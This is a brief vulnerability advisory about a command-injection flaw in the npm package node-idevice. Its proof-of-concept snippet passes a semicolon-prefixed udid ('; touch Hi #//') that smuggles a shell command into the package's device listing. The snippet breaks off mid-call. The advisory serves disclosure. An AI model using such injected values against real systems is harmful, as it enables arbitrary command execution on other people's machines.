vulnerability command injection
severity 3.8
language javascript
registry npm


node-idevice is a package to install apps to iOS devices via node.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char while declaring the udid on IDevice(see PoC). It is then executed with any function calling IDevice.prototype.list.

Proof of Concept

var idevice = require('node-idevice');
var device = new idevice("; touch Hi #//");

device.isInstalled("hacked", function (err, installed) {